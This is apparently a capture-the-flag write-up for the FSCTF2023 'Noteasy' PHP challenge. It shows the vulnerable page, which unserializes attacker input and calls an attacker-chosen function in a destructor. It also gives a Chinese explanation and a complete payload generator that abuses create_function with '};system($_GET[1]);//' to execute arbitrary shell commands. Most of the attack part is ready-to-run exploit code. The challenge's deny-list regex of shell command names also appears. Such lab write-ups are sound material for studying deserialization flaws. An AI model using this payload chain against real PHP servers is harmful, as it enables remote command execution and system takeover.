题目源码（index.php）
<?php
/**
 * Challenge gadget class (the served index.php, see show_source() below).
 *
 * Nothing in the visible code ever does `new Noteasy`; the object only comes
 * into existence when unserialize() rebuilds it from the attacker-supplied
 * ?file= blob, and the interesting code runs in __destruct() when that object
 * is freed.
 */
class Noteasy
{
protected $param1;
protected $param2;
/**
 * Calls $param1('', $param2): an attacker-chosen function name invoked with an
 * attacker-chosen second argument.
 *
 * Only param2 is screened, by a case-insensitive substring deny-list; param1
 * is not checked at all. Anything the list does not enumerate (e.g. "}", ";",
 * "system", "$_GET") passes through.
 * NOTE(review): preg_match() returns false on a PCRE error (backtrack limit,
 * etc.), which this `if` treats the same as "no match" - the filter fails
 * open. Comparing the result with `!== 0` would fail closed.
 */
function __destruct()
{
$a = $this->param1;
$b = $this->param2;
if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
die('this param is error!');
} else {
$a('', $b);
}
}
}
// Entry point of the challenge page.
if (isset($_GET['file'])) {
    // Attacker-controlled bytes go straight into unserialize(); any class with
    // a magic method (here Noteasy::__destruct) becomes a gadget. Nothing is
    // done with the result - the side effects of the destructor are the point.
    unserialize(base64_decode($_GET['file']));
} else {
    // No payload: print our own source and a greeting.
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
}
一眼丁真：利用 create_function。黑名单只检查 param2，而且没有拦 `}`、`;`、`system`、`$_GET` 这些字符/单词，param1 则完全不过滤，所以 param1 取 `create_function`、param2 取 `};system($_GET[1]);//`。`create_function('', $b)` 会把 $b 拼进 `function(){ ... }` 的函数体：开头的 `};` 提前闭合空函数体，末尾的 `//` 注释掉原本的右花括号，于是 `system($_GET[1])` 在 create_function 被调用时就直接执行，命令通过 `&1=命令` 传入。注意两点：create_function 在 PHP 7.2 已弃用、8.0 已移除，这条链只对 PHP < 8 的目标有效；生成的 base64 里可能含有 `+`、`/`、`=`，放进 URL 之前要先 urlencode，否则 `+` 会被当成空格。
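/**
 * Payload generator for the FSCTF2023 "Noteasy" challenge.
 *
 * Only the class name and the two protected property values matter: the
 * target unserialize()s the blob and its own __destruct() evaluates
 * $param1('', $param2). The challenge's __destruct is deliberately NOT copied
 * here - keeping it would run the payload on the attacker's own host when the
 * object is freed at script shutdown (and on PHP >= 8, where create_function()
 * no longer exists, end the generator with an uncaught Error).
 *
 * Gadget: create_function('', '};system($_GET[1]);//') compiles the source
 * "function(){};system($_GET[1]);//}" - the leading "};" closes the empty
 * function body early and the trailing "//" comments out the closing brace,
 * so system($_GET[1]) runs as top-level code inside create_function() itself.
 * This needs PHP < 8.0 on the target (create_function() was deprecated in 7.2
 * and removed in 8.0).
 */
class Noteasy
{
    /** The exact deny-list the challenge applies to param2 (case-insensitive). */
    private const BLACKLIST = '/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i';

    /** Function the target will call; never filtered by the challenge. */
    protected $param1 = "create_function";
    /** Second argument to that function; must survive BLACKLIST. */
    protected $param2 = "};system(\$_GET[1]);//";

    /**
     * Fail fast if the payload would be rejected by the target's filter, so a
     * bad edit is caught here instead of as "this param is error!" remotely.
     * unserialize() on the target never invokes this constructor, and it does
     * not affect the serialized form (only properties are serialized).
     *
     * @throws \RuntimeException when param2 matches the deny-list, or when the
     *                           PCRE call itself fails (treated as a rejection,
     *                           unlike the fail-open check on the target).
     */
    public function __construct()
    {
        $hit = preg_match(self::BLACKLIST, $this->param2);
        if ($hit !== 0) {
            throw new \RuntimeException('payload would be rejected by the target filter');
        }
    }
}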
// Serialize the gadget and base64 it, matching the target's base64_decode($_GET['file']).
// The output may contain '+', '/' and '=': urlencode it before placing it in the query string.
$payload = serialize(new Noteasy());
echo base64_encode($payload);